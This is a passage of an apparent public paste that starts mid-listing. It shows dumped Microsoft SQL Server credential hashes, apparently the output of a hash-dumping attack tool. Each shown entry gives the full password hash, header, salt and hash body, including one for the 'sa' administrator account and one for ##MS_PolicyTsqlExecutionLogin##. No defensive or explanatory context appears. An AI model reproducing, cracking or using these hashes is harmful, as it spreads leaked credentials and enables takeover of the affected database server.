  677. header: 0x0100
  678. salt: 6a2b76b9
  679. mixedcase: 942b199cf1023a83dd09fae3feaedcec18fd1780
  680.  
  681. [*] ##MS_PolicyTsqlExecutionLogin## [1]:
  682. password hash: 0x0100a7d0bff7ad3ce943e382d9386e42d51a36ebbf0c02c7bd7a
  683. header: 0x0100
  684. salt: a7d0bff7
  685. mixedcase: ad3ce943e382d9386e42d51a36ebbf0c02c7bd7a
  686.  
  687. [*] sa [1]:
  688. password hash: 0x0100d48e309b78a6e07804e35925e783a1e9c7b8421d7790895c
  689. header: 0x0100
  690. salt: d48e309b
  691. mixedcase: 78a6e07804e35925e783a1e9c7b8421d7790895c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement